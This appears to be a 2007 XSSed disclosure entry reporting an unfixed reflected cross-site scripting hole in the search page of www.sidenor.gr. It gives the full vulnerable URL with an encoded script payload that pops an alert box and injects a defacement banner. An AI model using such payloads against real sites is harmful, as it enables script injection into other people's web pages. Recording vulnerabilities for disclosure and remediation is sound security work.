Unfixed XSS vulnerability at www.sidenor.gr

2007-06-11T00:00:00
ID XSSED:25345
Type xssed
Reporter St@R-gaZ3r
Modified 2007-11-16T00:00:00

Description

Security researcher St@R-gaZ3r, has submitted on 06/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.sidenor.gr, which at the time of submission ranked 1322820 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.sidenor.gr/SearchResults.aspx?SearchTxtB=%3cscript%3ealert(String.fromCharCode(83%2c116%2c64%2c82%2c45%2c103%2c97%2c90%2c51%2c114))%3c%2fscript%3e%3cmarquee%3e%3ch1%3eSt%40R-gaZ3r%3c%2fh1%3e%3c%2fmarquee%3e&SearchButt.x=13&SearchButt.y=14&LabelWithTitle=&HiddenTBXIDMenuOpen=120&HiddenTBOpen=&HiddenTBOpenProd=&HiddenTBSelectedName=&HiddenTBXallidsfromprods=&SearchCateg_=&TBdate=6%2f11%2f2007&lang=EN